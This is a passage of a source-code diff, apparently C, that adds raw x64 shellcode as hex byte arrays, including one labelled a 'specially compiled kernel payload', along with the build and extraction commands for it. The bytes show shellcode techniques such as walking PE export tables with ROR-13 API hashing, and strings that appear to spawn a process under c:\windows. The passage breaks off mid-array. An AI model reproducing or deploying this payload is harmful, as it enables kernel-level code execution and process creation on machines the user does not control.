+ 0x8b, 0x38, 0x03, 0x00, 0x00, 0x8b, 0x83, 0x30, 0x03, 0x00, 0x00, 0x45,
+ 0x33, 0xc9, 0x89, 0x44, 0x24, 0x30, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x4c,
+ 0x24, 0x28, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x8b, 0x4d, 0x6f, 0x33, 0xd2,
+ 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x8b,
+ 0xf8, 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x96,
+ 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00,
+ 0x8b, 0xc7, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b,
+ 0x7b, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x81,
+ 0xec, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x48, 0x8d, 0x54, 0x24,
+ 0x20, 0x48, 0x8b, 0x49, 0x08, 0xe8, 0xba, 0x00, 0x00, 0x00, 0x4c, 0x8b,
+ 0x83, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x03, 0x43, 0x28, 0x48, 0x81, 0xbb,
+ 0x00, 0x01, 0x00, 0x00, 0x38, 0x03, 0x00, 0x00, 0x0f, 0x82, 0x86, 0x00,
+ 0x00, 0x00, 0x48, 0xb8, 0x0f, 0x13, 0xaa, 0x93, 0xad, 0x20, 0xe7, 0x79,
+ 0x49, 0x39, 0x00, 0x75, 0x77, 0x49, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xf8,
+ 0x01, 0x75, 0x19, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8,
+ 0xc0, 0xfa, 0xff, 0xff, 0x48, 0x63, 0xc8, 0x48, 0x89, 0x8b, 0x20, 0x02,
+ 0x00, 0x00, 0xeb, 0x60, 0x48, 0x83, 0xf8, 0x03, 0x75, 0x0f, 0x48, 0x8d,
+ 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0xe9, 0xfc, 0xff, 0xff, 0xeb,
+ 0xdf, 0x48, 0x83, 0xf8, 0x02, 0x75, 0x0f, 0x48, 0x8d, 0x54, 0x24, 0x20,
+ 0x48, 0x8b, 0xcb, 0xe8, 0x1c, 0xfe, 0xff, 0xff, 0xeb, 0xca, 0x48, 0x83,
+ 0xf8, 0x04, 0x75, 0x0f, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb,
+ 0xe8, 0xb3, 0xf8, 0xff, 0xff, 0xeb, 0xb5, 0x48, 0x83, 0xf8, 0x05, 0x75,
+ 0x1b, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0x7e, 0xf9,
+ 0xff, 0xff, 0xeb, 0xa0, 0xb8, 0x01, 0x00, 0x00, 0xc0, 0x48, 0x89, 0x83,
+ 0x20, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xf0, 0x00, 0x00, 0x00, 0x5b,
+ 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+ 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c, 0x89, 0x70, 0x20, 0x55,
+ 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90, 0x00, 0x00, 0x00, 0x4c,
+ 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b, 0xd7, 0xc7, 0x45, 0xeb,
+ 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8, 0x00, 0x00, 0x00, 0xc7,
+ 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d, 0x75, 0x4b, 0xc7, 0x45,
+ 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00, 0x00, 0x00, 0xc7, 0x45,
+ 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb, 0xce, 0xad, 0x90, 0x4d,
+ 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7, 0x45, 0x03, 0x8f, 0xb5,
+ 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd, 0x05, 0xc7, 0x45, 0x0b,
+ 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9, 0xc5, 0x6e, 0x6c, 0xc7,
+ 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45, 0x17, 0x9b, 0x97, 0x64,
+ 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8, 0xc7, 0x45, 0x1f, 0x3d,
+ 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0, 0x35, 0x30, 0xc7, 0x45,
+ 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b, 0x61, 0x4c, 0x04, 0x5d,
+ 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7, 0x45, 0x33, 0xb8, 0xd4,
+ 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0, 0x6f, 0xc7, 0x45, 0x3b,
+ 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde, 0x24, 0xe6, 0xf7, 0xc7,
+ 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45, 0x47, 0x36, 0x31, 0x0e,
+ 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce, 0x8b, 0x16, 0x48, 0x8d,
+ 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48, 0x89, 0x07, 0x83, 0xc3,
+ 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90, 0x00, 0x00, 0x00, 0x49,
+ 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0x7b, 0x20, 0x4d,
+ 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x8b, 0xc4, 0x48,
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
+ 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9, 0x74, 0x7a, 0xb8, 0x4d,
+ 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70, 0x48, 0x63, 0x41, 0x3c,
+ 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50, 0x45, 0x00, 0x00, 0x75,
+ 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd1, 0x74, 0x54,
+ 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x4b, 0x8b, 0x42, 0x20,
+ 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c, 0x8d, 0x0c, 0x01, 0x8b,
+ 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9, 0x45, 0x33, 0xc0, 0x45,
+ 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c, 0x03, 0xd1, 0x33, 0xdb,
+ 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2, 0xc1, 0xcb, 0x0d, 0x03,
+ 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee, 0x3b, 0xdd, 0x74, 0x23,
+ 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45, 0x3b, 0xc3, 0x72, 0xd4,
+ 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48, 0x8b, 0x6c, 0x24, 0x10,
+ 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c, 0x24, 0x20, 0xc3, 0x46,
+ 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14, 0x73, 0xde, 0x42, 0x8b,
+ 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7
+ };
+ *ppb = WINX64_VFS_BIN;
+ *pcb = sizeof(WINX64_VFS_BIN);
+}
+
+// specially compiled kernel payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM /D_EXEC_USER_EXTERNAL wx64_pscreate.c
+// ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
+// shellcode64.exe -o wx64_pscmd.exe
+// xxd -i wx64_pscmd.bin
+VOID GetData_PSCMD_KERNEL(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_PSCMD_KERNEL_BIN[] = {
+ 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20,
+ 0xe8, 0x7b, 0x06, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3, 0x0f, 0x20,
+ 0xd8, 0xc3, 0x0f, 0x09, 0xc3, 0xcc, 0xcc, 0xcc, 0x40, 0x55, 0x53, 0x56,
+ 0x57, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0x6c, 0x24, 0xd9,
+ 0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xb9, 0x20, 0x01,
+ 0x00, 0x00, 0x48, 0x8b, 0xf2, 0x48, 0x83, 0x65, 0x7f, 0x00, 0x48, 0x8d,
+ 0x55, 0x7f, 0x48, 0x83, 0x65, 0x77, 0x00, 0x48, 0x8b, 0xd9, 0x45, 0x33,
+ 0xf6, 0x48, 0xc7, 0x45, 0x97, 0x00, 0x10, 0x00, 0x00, 0x4c, 0x21, 0x75,
+ 0x67, 0x49, 0x8b, 0xcf, 0x49, 0x8b, 0xf8, 0x41, 0xff, 0x50, 0x58, 0x48,
+ 0x63, 0xc8, 0x41, 0xbd, 0x00, 0x00, 0x00, 0xc0, 0x8b, 0xc1, 0x41, 0x23,
+ 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20, 0x02, 0x00,
+ 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0xe9, 0xc1, 0x01, 0x00, 0x00, 0xba, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0xf7, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xba, 0x10, 0x00, 0x00,
+ 0x00, 0x48, 0x8d, 0x4d, 0x9f, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x4c,
+ 0x21, 0x75, 0xa7, 0x4c, 0x8d, 0x4d, 0x9f, 0x4c, 0x8d, 0x45, 0xf7, 0x4c,
+ 0x89, 0x7d, 0x9f, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x8d, 0x4d, 0x67,
+ 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48, 0x63, 0xc8, 0x8b, 0xc1, 0x41,
+ 0x23, 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20, 0x02,
+ 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
+ 0x00, 0xe9, 0x45, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x67, 0x4c, 0x8d,
+ 0x4d, 0x97, 0xc7, 0x44, 0x24, 0x28, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x55, 0x77, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
+ 0x00, 0x30, 0x00, 0x00, 0xff, 0x57, 0x78, 0x48, 0x63, 0xc8, 0x8b, 0xc1,
+ 0x41, 0x23, 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20,
+ 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x05, 0x00,
+ 0x00, 0x00, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x7f, 0x48,
+ 0x8d, 0x55, 0xb7, 0xff, 0x57, 0x18, 0x4c, 0x39, 0xb3, 0x30, 0x01, 0x00,
+ 0x00, 0x74, 0x38, 0x4c, 0x8b, 0xc7, 0x48, 0x8b, 0xd6, 0x48, 0x8b, 0xcb,
+ 0xe8, 0x3f, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75,
+ 0x22, 0x48, 0xc7, 0x83, 0x20, 0x02, 0x00, 0x00, 0x05, 0x40, 0x00, 0x80,
+ 0x48, 0x8d, 0x4d, 0xb7, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x06,
+ 0x00, 0x00, 0x00, 0xff, 0x57, 0x20, 0xe9, 0xb0, 0x00, 0x00, 0x00, 0x4c,
+ 0x8b, 0x4d, 0x77, 0x4c, 0x8b, 0xc7, 0x48, 0x8b, 0xd6, 0x4c, 0x89, 0x74,
+ 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0x16, 0x03, 0x00, 0x00, 0x8b, 0xc8,
+ 0x41, 0x23, 0xcd, 0x41, 0x3b, 0xcd, 0x48, 0x8d, 0x4d, 0xb7, 0x75, 0x16,
+ 0x48, 0x98, 0x48, 0x89, 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83,
+ 0x28, 0x02, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xeb, 0xbd, 0xff, 0x57,
+ 0x20, 0x4c, 0x8b, 0x57, 0x68, 0x4d, 0x85, 0xd2, 0x74, 0x69, 0x48, 0x8b,
+ 0x4d, 0x67, 0x48, 0x8d, 0x45, 0xe7, 0x48, 0x89, 0x44, 0x24, 0x48, 0x45,
+ 0x33, 0xc9, 0x48, 0x8d, 0x45, 0xaf, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x44,
+ 0x24, 0x40, 0x33, 0xd2, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x48, 0x8b,
+ 0x45, 0x77, 0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x83, 0x64, 0x24, 0x28,
+ 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x41, 0xff, 0xd2, 0x8b, 0xc8,
+ 0x41, 0x23, 0xcd, 0x41, 0x3b, 0xcd, 0x75, 0x16, 0x48, 0x98, 0x48, 0x89,
+ 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00,
+ 0x0a, 0x00, 0x00, 0x00, 0xeb, 0x0d, 0xba, 0xfa, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xce, 0xe8, 0x61, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x67, 0x48,
+ 0x85, 0xc9, 0x74, 0x06, 0xff, 0x96, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
+ 0x4d, 0x7f, 0x48, 0x85, 0xc9, 0x74, 0x03, 0xff, 0x57, 0x48, 0x48, 0x81,
+ 0xc4, 0xe0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x5f,
+ 0x5e, 0x5b, 0x5d, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c,
+ 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83,
+ 0xec, 0x40, 0x4c, 0x8b, 0xe2, 0x48, 0x8b, 0xf1, 0x33, 0xd2, 0x4d, 0x8b,
+ 0xf1, 0x4d, 0x8b, 0xf8, 0x4c, 0x8d, 0x4c, 0x24, 0x70, 0x45, 0x33, 0xc0,
+ 0x8d, 0x5a, 0x05, 0x8b, 0xcb, 0xff, 0x96, 0xa8, 0x00, 0x00, 0x00, 0x3d,
+ 0x04, 0x00, 0x00, 0xc0, 0x0f, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x8b, 0x4c,
+ 0x24, 0x70, 0x85, 0xc9, 0x0f, 0x84, 0xa6, 0x00, 0x00, 0x00, 0x8b, 0xd1,
+ 0x33, 0xc9, 0xff, 0x56, 0x08, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75,
+ 0x0a, 0xb8, 0x0e, 0x00, 0x07, 0x80, 0xe9, 0x8d, 0x00, 0x00, 0x00, 0x44,
+ 0x8b, 0x44, 0x24, 0x70, 0x4c, 0x8d, 0x4c, 0x24, 0x70, 0x48, 0x8b, 0xd7,
+ 0x8b, 0xcb, 0xff, 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xc0,
+ 0x78, 0x6a, 0x48, 0x8b, 0xdf, 0xba, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4c, 0x24, 0x30, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x43,
+ 0x50, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00,
+ 0x48, 0x89, 0x44, 0x24, 0x20, 0x49, 0x8b, 0xd4, 0x48, 0x8b, 0xce, 0xe8,
+ 0x5c, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8d, 0x4c, 0x24, 0x30,
+ 0xff, 0x16, 0x85, 0xc0, 0x74, 0x23, 0x8b, 0x03, 0x85, 0xc0, 0x74, 0x16,
+ 0x48, 0x03, 0xd8, 0x48, 0x3b, 0xdf, 0x72, 0x1c, 0x8b, 0x44, 0x24, 0x70,
+ 0x48, 0x03, 0xc7, 0x48, 0x3b, 0xd8, 0x73, 0x10, 0xeb, 0xa7, 0xbd, 0x9f,
+ 0x13, 0x07, 0x80, 0xeb, 0x07, 0x48, 0x8b, 0x43, 0x50, 0x49, 0x89, 0x06,
+ 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x10, 0x8b, 0xc5, 0x4c, 0x8d, 0x5c, 0x24,
+ 0x40, 0x49, 0x8b, 0x5b, 0x38, 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3,
+ 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5c, 0x5f, 0x5e, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57,
+ 0x41, 0x56, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf1,
+ 0x48, 0x8d, 0x54, 0x24, 0x48, 0x49, 0x8b, 0xc8, 0x49, 0x8b, 0xe9, 0xff,
+ 0x56, 0x58, 0x8b, 0xf8, 0x85, 0xc0, 0x78, 0x23, 0x48, 0x8b, 0x4c, 0x24,
+ 0x48, 0xff, 0x56, 0x50, 0x48, 0x8b, 0xc8, 0x48, 0x8b, 0xd5, 0x48, 0x8b,
+ 0xd8, 0xff, 0x56, 0x70, 0x48, 0x8b, 0x4c, 0x24, 0x60, 0x48, 0x8b, 0xd3,
+ 0x4c, 0x8b, 0xc0, 0x41, 0xff, 0x56, 0x60, 0x48, 0x8b, 0x5c, 0x24, 0x40,
+ 0x8b, 0xc7, 0x48, 0x8b, 0x6c, 0x24, 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41,
+ 0x5e, 0x5f, 0x5e, 0xc3, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+ 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c, 0x89, 0x70, 0x20, 0x55,
+ 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x70, 0x4c, 0x8b, 0xf1, 0xc7, 0x45,
+ 0xb0, 0x5d, 0xc6, 0x94, 0xfb, 0xc7, 0x45, 0xb4, 0xa3, 0x8d, 0x98, 0x2b,
+ 0x48, 0x8d, 0xba, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8, 0xf9, 0x95,
+ 0xc6, 0x88, 0x48, 0x8d, 0x75, 0xf4, 0xc7, 0x45, 0xbc, 0xbe, 0x47, 0x00,
+ 0x9e, 0xbb, 0x11, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xc0, 0xf4, 0xdc, 0x47,
+ 0xf0, 0xc7, 0x45, 0xc4, 0xbc, 0x1e, 0x36, 0x9f, 0xc7, 0x45, 0xc8, 0x92,
+ 0xf5, 0x45, 0x13, 0xc7, 0x45, 0xcc, 0xcd, 0x1d, 0xeb, 0xbc, 0xc7, 0x45,
+ 0xd0, 0x2b, 0x0e, 0xd0, 0x97, 0xc7, 0x45, 0xd4, 0xd6, 0x3f, 0x05, 0x2e,
+ 0xc7, 0x45, 0xd8, 0xec, 0xee, 0xe7, 0x8b, 0xc7, 0x45, 0xdc, 0x2a, 0xb8,
+ 0xa0, 0xa3, 0xc7, 0x45, 0xe0, 0x0d, 0x0e, 0x0b, 0x0e, 0xc7, 0x45, 0xe4,
+ 0x41, 0x20, 0x2f, 0x44, 0xc7, 0x45, 0xe8, 0xa8, 0x3b, 0xfb, 0xe0, 0xc7,
+ 0x45, 0xec, 0xed, 0x4a, 0x3d, 0xd3, 0xc7, 0x45, 0xf0, 0x60, 0x9d, 0xd0,
+ 0xf0, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce, 0x8b, 0x16, 0x48, 0x8d,
+ 0x7f, 0xf8, 0xe8, 0x49, 0x04, 0x00, 0x00, 0x48, 0x89, 0x07, 0x83, 0xc3,
+ 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x5c, 0x24, 0x70, 0x49, 0x8b, 0x5b, 0x10,
+ 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28,
+ 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
+ 0x89, 0x78, 0x20, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec,
+ 0x20, 0x4c, 0x8b, 0x71, 0x68, 0x4c, 0x8d, 0xa1, 0x00, 0x04, 0x00, 0x00,
+ 0x4c, 0x89, 0xb1, 0x80, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc6, 0x25, 0xff,
+ 0x0f, 0x00, 0x00, 0x41, 0xbf, 0x00, 0x10, 0x00, 0x00, 0x44, 0x2b, 0xf8,
+ 0x48, 0x8b, 0xfa, 0x4c, 0x89, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x48, 0xb8,
+ 0x66, 0x66, 0x77, 0x77, 0x66, 0x66, 0x77, 0x77, 0x48, 0x89, 0x41, 0x78,
+ 0x48, 0x8b, 0xd9, 0x49, 0x8b, 0x06, 0xba, 0x04, 0x01, 0x00, 0x00, 0x48,
+ 0x89, 0x81, 0x88, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xe9, 0x49, 0x8b, 0xcc,
+ 0x41, 0xff, 0x50, 0x70, 0x48, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x57, 0x00,
+ 0x07, 0x80, 0xeb, 0x47, 0xba, 0x00, 0x10, 0x00, 0x00, 0x48, 0x8b, 0xcd,
+ 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xc7, 0x49, 0x8b, 0xd6,
+ 0x48, 0x8b, 0xcd, 0xff, 0x57, 0x60, 0x41, 0xb8, 0x04, 0x01, 0x00, 0x00,
+ 0x48, 0x8d, 0x8d, 0xe8, 0x0e, 0x00, 0x00, 0x49, 0x8b, 0xd4, 0xff, 0x57,
+ 0x60, 0x8b, 0x83, 0x28, 0x01, 0x00, 0x00, 0x89, 0x85, 0xf8, 0x0f, 0x00,
+ 0x00, 0x48, 0x8b, 0x44, 0x24, 0x60, 0x48, 0x89, 0x85, 0xf0, 0x0f, 0x00,
+ 0x00, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24,
+ 0x48, 0x48, 0x8b, 0x74, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x48,
+ 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5c, 0xc3, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x41, 0x56, 0x48, 0x83, 0xec,
+ 0x30, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xe9, 0x41, 0xbe, 0x00, 0x20, 0x00,
+ 0x00, 0x33, 0xc9, 0x41, 0x8b, 0xd6, 0x49, 0x8b, 0xf0, 0xff, 0x53, 0x08,
+ 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x07, 0x33, 0xc0, 0xe9, 0x90,
+ 0x00, 0x00, 0x00, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0x80,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x45, 0x33, 0xc9,
+ 0x45, 0x33, 0xc0, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x16, 0x4c,
+ 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x08, 0x48, 0x8b, 0xcf, 0xff, 0x53,
+ 0x10, 0xeb, 0xc9, 0x33, 0xd2, 0x49, 0x8b, 0xce, 0x44, 0x8d, 0x42, 0x02,
+ 0xff, 0x56, 0x40, 0x45, 0x33, 0xc9, 0xc7, 0x44, 0x24, 0x28, 0x10, 0x00,
+ 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x49, 0x8b, 0xce, 0x45, 0x8d,
+ 0x41, 0x01, 0x41, 0x8a, 0xd0, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xf0, 0x48,
+ 0x85, 0xc0, 0x74, 0xc7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x30, 0x48, 0x8d,
+ 0x8e, 0x00, 0x10, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00,
+ 0xff, 0x53, 0x30, 0x48, 0x89, 0x85, 0x18, 0x02, 0x00, 0x00, 0x48, 0x8b,
+ 0xc6, 0x48, 0x89, 0xbd, 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0xb5, 0x38,
+ 0x02, 0x00, 0x00, 0x48, 0x8b, 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24,
+ 0x48, 0x48, 0x8b, 0x74, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x48,
+ 0x83, 0xc4, 0x30, 0x41, 0x5e, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x08, 0x55, 0x48, 0x8d, 0xac, 0x24, 0x50, 0xff, 0xff, 0xff, 0x48, 0x81,
+ 0xec, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x48, 0x8d, 0x55, 0xe0,
+ 0x48, 0x8b, 0x49, 0x08, 0xe8, 0x13, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4b,
+ 0x08, 0x48, 0x8d, 0x54, 0x24, 0x50, 0xe8, 0x1d, 0xfd, 0xff, 0xff, 0xb8,
+ 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x4c, 0x6f, 0x67, 0x6f,
+ 0x4c, 0x8d, 0x8b, 0x20, 0x01, 0x00, 0x00, 0x48, 0x89, 0x83, 0x30, 0x01,
+ 0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89, 0x83, 0x40, 0x01,
+ 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x24, 0x6e,
+ 0x55, 0x49, 0x2e, 0x48, 0x8d, 0x4d, 0xe0, 0xc7, 0x44, 0x24, 0x28, 0x65,
+ 0x78, 0x65, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x63, 0x3a, 0x5c, 0x77, 0xc7,
+ 0x44, 0x24, 0x34, 0x69, 0x6e, 0x64, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x77,
